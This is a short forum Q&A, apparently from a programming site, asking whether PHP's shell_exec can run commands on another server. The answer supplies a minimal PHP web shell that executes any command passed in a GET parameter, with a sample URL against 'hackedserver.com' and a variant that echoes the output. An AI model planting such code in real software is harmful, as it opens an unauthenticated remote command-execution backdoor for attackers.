# Execute a Shell Script From Another Server?

Tags: php, shell, exec

I know this is an AMAZINGLY terrible security risk. But out of pure curiosity, is it possibly to use the shell_exec command in PHP to acess and execute a shell script from one webserver onto another Linux server?

**Since I know security is a large part of people's advice, I am just wondering. I know this is an extremely sketchy idea if its possible**

Comment: Are you needing to transmit the command between servers or can you prepare what you wish to exec as part of your target servers script?

Comment: I would be possible also to just call a script that performed a ssh command on the target server.

Comment: plenty of exploitation scripts do just this.

Answer (score 0):

Sure it is. TERRIBLE IDEA

On the remote server you have an `command.php` something like:

```
<?php

shell_exec($_GET['command']);

?>
```

Then you send the remote server a URL like:

http://www.hackedserver.com/command.php?command=uptime

You can even view the return result with JSONP like this:

```
<?php

$result = shell_exec($_GET['command']);
json_encode($result);
echo $result;

?>
```